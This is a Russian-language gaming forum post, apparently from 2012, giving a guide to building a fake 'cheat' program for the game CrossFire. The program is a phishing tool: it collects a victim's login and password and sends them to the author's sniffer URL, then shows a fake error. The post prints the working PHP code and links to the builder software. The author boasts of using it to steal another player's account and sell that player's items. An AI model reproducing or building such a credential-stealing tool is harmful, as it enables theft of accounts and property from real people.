1. Привет Гость, в нашем магазине проходит акция! Смотри эту тему.
    Так же цена на VIP снижена!

Как Сделать Фейк Прогу (с Видео)

Тема в разделе "Гайды для CrossFire", создана пользователем про100_Рустем_о_О, 3 дек 2012.

Статус темы:
Закрыта.
  1. Всем привет!)

Сейчас я б хотел показать вам как делаеться фейк програмки.
    Немного о них:
    Кто не знает что это такое: это как б прога для взлома очень полезна когда есть назяши школотрон (можно попробывать на нём))Она может взломать эмэйл,акк с кроссфаера или с других игр.Лично я ей пользывалься тока 1 раз когда бесил 1 чел в кф я сказал что у мя есть чит на крд, показал че я выбел на зм и сказал что я купил это с читом на крд он поверил я кинул ему по скайпу и все он вписал в полях логин и пороль а мне это пришло на сайт(че за сайт увидите на видео) я тупо продал все что есть у него на складе.:D​

Итак преступим чтобы сделать всё как на видео нам понадабиться PHP Devel Studio 2.0 beta скачать ее:http://fileshare7470.depositfiles.com/auth-1354466824a79ba37fa96d345fc5226b-217.76.69.4-739774200-129588892-guest/FS747-2/setupDevelStudio2.0beta2.exe?

а и если не увидели какой код на видео:
    $edit1 = c('Form1->edit1')->text;
    $edit2 = c('Form1->edit2')->text;
    $combobox1 = c('Form1->combobox1')->inText;
    $url = "Ваш снифффер";
    file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
    MessageBox("Увы, но вы что то ввели неверно", "Ошибка!");
    app::close()
    И смотрите видео в HD чтоб увидеть сайт,а и вот видео тут все понятно что и куда вставлять!:

lol3311, про100Кф, asrest и 4 другим нравится это.
  2.  
Статус темы:
Закрыта.

Поделиться этой страницей

Уважаемый пользователь!

Мы обнаружили, что вы блокируете показ рекламы на нашем сайте.

Просим внести его в список исключения или отключить AdBlock.

Наши материалы предоставляются БЕСПЛАТНО и единственным доходом является реклама.

Спасибо за понимание!